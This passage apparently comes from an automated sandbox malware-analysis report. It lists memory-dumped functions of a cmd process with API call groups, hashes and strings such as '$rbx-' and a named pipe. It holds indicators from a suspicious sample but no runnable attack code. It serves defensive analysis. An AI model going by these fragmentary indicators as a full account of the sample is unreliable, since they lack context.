                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 9bcdcfd4bb3ba59b201d19b2003eb575ddf974bd91f841488bb05203616edd1b
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: F2D1CF32605F80CAEB20DF75D94839DB7A0F74AB89F100105EEA957BD6CB36C48AC746
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: ad4e632e629553a7d3238177e3a4f122d5dd088c6566c67c30895bb8426e2389
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: F9D17C32604F40C7EB62DF659C8879DB7E0F74A789F100215EA8957BD6DB38E089C704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: 8e2dce530f5c9e3f54c2b77f8494cc045adce24ad891009a9ece2350228854f3
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 0B418173214F80D7E7A1CF21E84879EB7A1F389B99F448115DA8947798DF38C589CB44
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: b14f8d5905580a62306e0943d236e20422251d70411d6b2c891fc66a94cb92d3
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 7541D233214F80DAE760CF21E84839EB7A5F389B99F048129DB8907B98DF39C449CB45
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$rbx-childproc
                                                  • API String ID: 166002920-1828357524
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: a7dc825a339c2fefd13c0a3cab1c253f6beefbbcde3be269d5cfaedc06ebb346
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 49113732614B40C3E751CB21F85835AB760F38AB96F944215EA9942AE8DF3CC248CB48
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$rbx-childproc
                                                  • API String ID: 166002920-1828357524
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: cf2e55505fe3f49b8a8556f539964b4b3af07f0e1c09c5d0e5480b95eede1ebe
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 9F112932618A41C2E710CB21F85875AA761F38AB96F944315EA6902BE8CF3CC149CB85
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: d608f2f3923d6cec9a9d0980d82d9cccd331001ecad87626b54064bb77a89f1d
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: E681D460600E41C7FB53FB759C89369E690EB9F786F544125EA88873D6EB38C94D8308
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 2cfe39848565bc594b947b11b25e99dc83019afb4f997f9bf033e415054707a3
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 8C812421600E40D6FB50EB669C4D36AE2D1EB8F782F544015EAAD873D6DB3ACD4D834B
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 499510113e82b1991e141984357a58b93eca8c1b44b3527d0cf7b765d4a2cb9f
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 7B81DF20601F41C7FA53FB2D9C49B99E2D1EB8F782F1454359AC847BD6DA38E84E8718
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9B31
                                                  • GetLastError.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000002527DEE9C6B,?,?,?,000002527DEE945C,?,?,?,?,000002527DEE8F65), ref: 000002527DEE9BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: d25476b845b4956b49fdb13d1ffb400953ed12fa4d8b35e0d0c74cb8f991257d
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 9A315C21212F40D2FE53DB26AC087A5A3D4FB5EBAAF590625AD194B7D4EB38C5488318
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19B31
                                                  • GetLastError.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: 9f5574d6cb9bfe00d1162653ea34bd125b54e33afb07219278a46be80e9d3884
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: EF31C021212E40D1EE15DB02AC087A9A395FB4EBA2F590624ED3D4B7D4EF39D54CC38A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 912798e3bffc6f1af4798feb7230ba2f93ccab9b12a94d351805c4cbedb84221
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 7C116031310F50C7E791CB52EC58719A6A4F79EBE6F444214EA5E87BD4DF38C5088748
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 88091b96aacfae45cd8c1938257aee1f756d3e772f66cf74d6a7f33a0ca50895
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: D9115E61210F80C6E750CB52FC6871EA6A0F78DBE6F544214EA6E87BD4CF38D508878A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 503f21be21535dfe44e0be62a07dbcad13fac42fb84f132db437f8b79aca50fa
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: EDD17876204F88C2EB71DB1AE89835AB7A0F38DB89F500616EA8D477E5DF38C555CB04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 249f9969b5c806dbf6d37b9ec9d506909f8a873facabf69c183254d08d0ccfee
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: FCD17676208F88C2DA70DB0AE89835AA7A0F38DB89F110116EADD477E9DF3DC555CB05
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: 470b762f2fbd9dafc48e4f602a89f117e96816887e9ff9e3eacf42ba27104674
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 7851BE30201F45D6FB06DF24EC982A8A3A1FB1E74AF804819A92D473E5EF78C61CC358
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: e0f370df7f09f8b4a64260c452671bffa197cfc2c5f855e68fb19aa8390f2417
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 79510534211F45D6EF05DB68ECA9298A3A1FB0E786F840915E93C063E9EF39C51CC35A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $rbx-
                                                  • API String ID: 756756679-3661604363
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: e4d6b75a9aeb01abd49adcfefc2d4ece883cd69ef8c8499da56306ec7fa980e0
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 41317E31701F56C3FA52DF36D948269E3A0FB5AF86F8844208E4847BD5EB34D4A98704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $rbx-
                                                  • API String ID: 756756679-3661604363
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: bba34257ec61664b0614a78b9033fa7a1fa1622ffc65ed6a24464132897b4a13
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 61318F22701F55D3EA11DF16AD48B6AE3E0FB5AB85F084020CF6807BD5EF39D4A98749
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
